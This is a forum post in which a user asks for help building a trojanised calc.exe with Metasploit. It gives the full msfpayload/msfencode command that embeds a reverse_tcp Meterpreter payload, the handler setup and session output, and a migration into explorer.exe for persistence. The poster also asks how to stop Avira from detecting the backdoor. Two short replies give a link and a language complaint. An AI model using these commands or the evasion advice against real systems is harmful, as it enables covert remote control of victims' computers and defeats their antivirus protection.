metasploit meterpreter injection in to executable crashes
Author: firoo
Sunday, 08 August 2010 10:02

Hi, I want to know some info about Metasploit Meterpreter injection into an EXE file without losing the executable's content. I mean I want to msfencode an msfpayload into an existing executable and have the new executable still function like the original. So if you inject into calc.exe you get calc.exe and your backdoor, so I can migrate to a new ID like EXPLORER.EXE when the user closes CALC.EXE. So I typed the following in my session:

~/trunk$ ./msfencode -h


Usage: ./msfencode

OPTIONS:

-a The architecture to encode as
-b The list of characters to avoid: '\x00\xff'
-c The number of times to encode the data
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)
-x Specify an alternate win32 executable template

Making our new backdoored executable:

~/trunk$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.210.11 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.210.11
LHOST => 192.168.210.11
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.210.11:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 3 opened (192.168.210.11:4444 -> 192.168.210.11:51695)

Then migrate away from the backdoored executable process, because if they close the exe you lose your shell.


meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > run migrate explorer.exe
[*] Current server process: calc_backdoor.exe (3360)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1592
[*] New server process: Explorer.EXE (1592)
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getpid
current pid: 1592

So my question is that when I encode it onto calc.exe and notepad.exe they crash, and the antivirus detects the exe signature as a trojan. I don't know why; I'm stuck on that. I kept on encoding them 10, even 20 times, and Avira is still detecting them as a trojan. But when I don't use the ./msfencode -h "-k Keep template working; run payload in new thread (use with -x)" option, it works fine without trojan detection from Avira. Can anyone help with keeping calc.exe and notepad.exe as they are, without losing the content and with no virus detection? Is it a payload problem that Avira is detecting?


Comments (2)

Posted by: زيد القريشي on August 08, 2010
Check out this topic, it may help you:
http://www.offensive-security.com/metasploit-unleashed/

Posted by: عبدالمهيمن الآغا on August 08, 2010
Next time we hope you will post in Arabic only! The iSecur1ty site is an Arab community and was created for Arabs =)
